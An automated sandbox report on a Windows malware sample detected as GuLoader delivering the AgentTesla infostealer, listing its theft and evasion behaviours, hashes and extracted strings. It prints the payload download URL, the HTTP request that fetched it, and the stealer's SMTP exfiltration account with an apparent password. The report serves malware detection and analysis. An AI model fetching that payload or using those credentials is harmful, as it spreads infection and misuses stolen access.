Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Overview

General Information

Sample Name: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
Analysis ID: 635379
MD5: e2e4196b84fdf8956baa7f99b11812af
SHA1: 7af0382928364f2fc088d13f96394f4d83bd01ae
SHA256: 7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for reading data from the clipboard

Classification

AV Detection

Source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin"}
Source: conhost.exe.4512.4.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fugen.ozkunt@paralikgroup.comFug1966Ozkmail.paralikgroup.comsaleseuropower2@yandex.com"}
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Virustotal: Detection: 21%
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E

Networking

Source: Malware configuration extractor URLs: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: global traffic HTTP traffic detected: GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: artist151sh.com Cache-Control: no-cache
Source: global traffic TCP traffic: 192.168.11.20:49777 -> 173.254.28.216:587
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000003.00000002.42052443379.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ckatRU.com
Source: user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#Attribution
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#Distribution
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#Notice
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#Reproduction
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr String found in binary or memory: http://creativecommons.org/ns#ShareAlike
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.paralikgroup.com
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, Toelike.exe.3.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://8tHZzAc0TjNm.org
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://8tHZzAc0TjNm.orgt-Wl
Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://8tHZzAc0TjNm.orgx
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: artist151sh.com
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405809

System Summary

Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00406D5F 1_2_00406D5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_713D1BFF 1_2_713D1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325E349 1_2_0325E349
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325CC31 1_2_0325CC31
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258525 1_2_03258525
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258720 1_2_03258720
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251707 1_2_03251707
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251706 1_2_03251706
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325671C 1_2_0325671C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258F60 1_2_03258F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325657D 1_2_0325657D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325657F 1_2_0325657F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03255340 1_2_03255340
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325174E 1_2_0325174E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251950 1_2_03251950
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258550 1_2_03258550
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03252D5D 1_2_03252D5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325EF5D 1_2_0325EF5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032517AE 1_2_032517AE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03256780 1_2_03256780
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325878F 1_2_0325878F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032603E2 1_2_032603E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032553F6 1_2_032553F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032585FB 1_2_032585FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258FC0 1_2_03258FC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251827 1_2_03251827
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325DE21 1_2_0325DE21
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251A05 1_2_03251A05
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03255004 1_2_03255004
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03255214 1_2_03255214
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325501C 1_2_0325501C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251A7E 1_2_03251A7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258844 1_2_03258844
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03259056 1_2_03259056
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325585B 1_2_0325585B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032552A0 1_2_032552A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032550AC 1_2_032550AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03255487 1_2_03255487
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03256682 1_2_03256682
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325868C 1_2_0325868C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251892 1_2_03251892
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258CE4 1_2_03258CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032554E7 1_2_032554E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258AE0 1_2_03258AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258AEC 1_2_03258AEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032560F0 1_2_032560F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325ECFE 1_2_0325ECFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_032518DB 1_2_032518DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_3_00EDD5B5 3_3_00EDD5B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00B1DE72 3_2_00B1DE72
